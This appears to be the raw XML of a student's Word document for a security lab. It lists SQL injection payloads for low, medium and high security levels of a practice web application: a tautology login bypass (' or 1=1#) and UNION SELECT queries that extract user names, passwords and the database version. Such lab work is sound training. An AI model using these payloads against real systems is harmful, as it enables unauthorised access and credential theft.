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DAC5E" w14:textId="77777777" w:rsidR="00DF2435" w:rsidRDefault="00DF2435" w:rsidP="006C32F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BC0016" w14:textId="77777777" w:rsidR="00DF2435" w:rsidRDefault="00DF2435" w:rsidP="006C32F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442C0692" w14:textId="70AA5641" w:rsidR="006C32F4" w:rsidRPr="00DF2435" w:rsidRDefault="00C83001" w:rsidP="006C32F4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Security level low:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163014BC" w14:textId="4E6F688E" w:rsidR="00A76D63" w:rsidRPr="006C32F4" w:rsidRDefault="00C83001" w:rsidP="006C32F4">
      <w:r w:rsidRPr="00C83001">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">First Name and Surname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094D35" wp14:editId="3CAD9B0D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-101600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>322580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="2713355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21383"/>
                <wp:lineTo x="21531" y="21383"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="677632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3288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2F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF2435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r w:rsidR="006C32F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83001">
        <w:t xml:space="preserve">' or </w:t>
      </w:r>
      <w:r w:rsidR="00AF35D6">
        <w:t>1=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C83001">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12314932" w14:textId="77777777" w:rsidR="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001"/>
    <w:p w14:paraId="13024722" w14:textId="77777777" w:rsidR="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001"/>
    <w:p w14:paraId="2A3086B9" w14:textId="75E5FE0A" w:rsidR="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001">
      <w:r w:rsidRPr="00C83001">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Password</w:t>
      </w:r>
      <w:r w:rsidR="006C32F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006C32F4" w:rsidRPr="00C83001">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C32F4">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00C83001">
        <w:t xml:space="preserve"> UNION SELECT First_name, password FROM users</w:t>
      </w:r>
      <w:r w:rsidR="00AF35D6">
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B326F01" w14:textId="77777777" w:rsidR="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001"/>
    <w:p w14:paraId="65CC92E1" w14:textId="4A65A624" w:rsidR="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38A37FF5" wp14:editId="163D3254">
            <wp:extent cx="4483100" cy="1977641"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1551057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57714" name="Picture 15510577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225" cy="197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277C" w14:textId="77777777" w:rsidR="006C32F4" w:rsidRDefault="006C32F4" w:rsidP="006C32F4"/>
    <w:p w14:paraId="6E130FEC" w14:textId="16092228" w:rsidR="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001">
      <w:r w:rsidRPr="00C83001">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Version</w:t>
      </w:r>
      <w:r w:rsidR="006C32F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="006C32F4" w:rsidRPr="00C83001">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00C83001">
        <w:t xml:space="preserve"> UNION SELECT First_name, version() FROM users #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D594021" w14:textId="58F1D245" w:rsidR="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="7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01C7895" wp14:editId="5D11FDA9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>228600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>419100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4876800" cy="2139315"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21350"/>
                <wp:lineTo x="21516" y="21350"/>
                <wp:lineTo x="21516" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="18192016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01672" name="Picture 18192016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A80B2" w14:textId="77777777" w:rsidR="00C83001" w:rsidRPr="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001"/>
    <w:p w14:paraId="14C01C71" w14:textId="77777777" w:rsidR="00C83001" w:rsidRPr="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001"/>
    <w:p w14:paraId="628EF361" w14:textId="77777777" w:rsidR="00C83001" w:rsidRPr="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001"/>
    <w:p w14:paraId="41356673" w14:textId="77777777" w:rsidR="00C83001" w:rsidRPr="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001"/>
    <w:p w14:paraId="259EF3BF" w14:textId="77777777" w:rsidR="00C83001" w:rsidRPr="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001"/>
    <w:p w14:paraId="4BE10156" w14:textId="77777777" w:rsidR="00C83001" w:rsidRPr="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001"/>
    <w:p w14:paraId="35C1AA98" w14:textId="77777777" w:rsidR="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001"/>
    <w:p w14:paraId="46D303FC" w14:textId="77777777" w:rsidR="00C83001" w:rsidRDefault="00C83001" w:rsidP="00C83001"/>
    <w:p w14:paraId="4EF324BD" w14:textId="77777777" w:rsidR="00DF2435" w:rsidRDefault="00DF2435" w:rsidP="00C83001">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718DEF5B" w14:textId="77777777" w:rsidR="00DF2435" w:rsidRDefault="00DF2435" w:rsidP="00C83001">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFC3889" w14:textId="77777777" w:rsidR="00DF2435" w:rsidRDefault="00DF2435" w:rsidP="00C83001">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD522C1" w14:textId="6D247728" w:rsidR="00C83001" w:rsidRPr="00DF2435" w:rsidRDefault="00C83001" w:rsidP="00C83001">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Security level Medium:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CBAADF" w14:textId="77700A81" w:rsidR="003924F4" w:rsidRDefault="00C83001" w:rsidP="00C83001">
      <w:r w:rsidRPr="00C83001">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003924F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Password</w:t>
      </w:r>
      <w:r w:rsidR="003924F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C83001">
        <w:t xml:space="preserve"> 1 or 1= 1 UNION SELECT First_name, password FROM users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1693C630" w14:textId="37967EA4" w:rsidR="009E67EE" w:rsidRDefault="001D5CD6" w:rsidP="00C83001">
      <w:r w:rsidRPr="001D5CD6">
        <w:t>1 or True UNION SELECT First_name, null FROM users #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497F711E" w14:textId="2C6E2DEB" w:rsidR="001D5CD6" w:rsidRDefault="001D5CD6" w:rsidP="00C83001">
      <w:r w:rsidRPr="001D5CD6">
        <w:t>1 or True UNION SELECT null, null FROM users #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02336E0B" w14:textId="7FF1AD35" w:rsidR="007B7F92" w:rsidRDefault="007B7F92" w:rsidP="00C83001">
      <w:r w:rsidRPr="007B7F92">
        <w:t>1 or 1= 1 UNION SELECT user, password FROM users #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310236F4" w14:textId="38550943" w:rsidR="003924F4" w:rsidRDefault="003924F4" w:rsidP="00C8300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511F37" wp14:editId="2ECAFF37">
            <wp:extent cx="5943600" cy="2607310"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="7702310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31097" name="Picture 7702310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88C9" w14:textId="77777777" w:rsidR="003924F4" w:rsidRDefault="003924F4" w:rsidP="003924F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278F173F" w14:textId="20C7DA3A" w:rsidR="003924F4" w:rsidRDefault="003924F4" w:rsidP="003924F4">
      <w:r w:rsidRPr="003924F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003924F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003924F4">
        <w:t>1 or 1= 1 UNION SELECT First_name, version() FROM users</w:t>
      </w:r>
      <w:r w:rsidR="00AF35D6">
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C0BB2F" w14:textId="0A592411" w:rsidR="003924F4" w:rsidRDefault="003924F4" w:rsidP="003924F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18C94FE8" wp14:editId="79AE4CF3">
            <wp:extent cx="5943600" cy="2607310"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="21066223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22313" name="Picture 21066223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54C2" w14:textId="77777777" w:rsidR="003924F4" w:rsidRDefault="003924F4" w:rsidP="003924F4"/>
    <w:p w14:paraId="1622C338" w14:textId="77777777" w:rsidR="003924F4" w:rsidRPr="003924F4" w:rsidRDefault="003924F4" w:rsidP="003924F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50217471" w14:textId="77777777" w:rsidR="003924F4" w:rsidRPr="00DF2435" w:rsidRDefault="003924F4" w:rsidP="003924F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Security level High: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9BCA4F" w14:textId="4C0AA9D0" w:rsidR="003924F4" w:rsidRDefault="003924F4" w:rsidP="003924F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003924F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> First Name and Surname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BA4C67" w14:textId="56D64E12" w:rsidR="006C32F4" w:rsidRPr="006C32F4" w:rsidRDefault="006C32F4" w:rsidP="003924F4">
      <w:r w:rsidRPr="006C32F4">
        <w:t>' UNION SELECT user, password FROM users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279FC270" w14:textId="7EFEC0F4" w:rsidR="003924F4" w:rsidRPr="003924F4" w:rsidRDefault="006C32F4" w:rsidP="003924F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E3D5D0F" wp14:editId="2A577EF5">
            <wp:extent cx="5943600" cy="2607310"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="20737645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64596" name="Picture 20737645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4F4" w:rsidRPr="00392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01"/>
    <w:rsid w:val="001D5CD6"/>
    <w:rsid w:val="002E7D69"/>
    <w:rsid w:val="00327106"/>
    <w:rsid w:val="003924F4"/>
    <w:rsid w:val="006C32F4"/>
    <w:rsid w:val="007B7F92"/>
    <w:rsid w:val="009E67EE"/>
    <w:rsid w:val="00A76D63"/>
    <w:rsid w:val="00AF35D6"/>
    <w:rsid w:val="00B60389"/>
    <w:rsid w:val="00B9310E"/>
    <w:rsid w:val="00C83001"/>
    <w:rsid w:val="00D8088A"/>
    <w:rsid w:val="00DF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0CAA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5117C00E-3B8C-4E90-B7DD-B8F8BDBF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SP21-BSE-033 (rizwan sabir)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>SP21-BSE-033 (rizwan sabir)</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-24T12:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-24T12:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>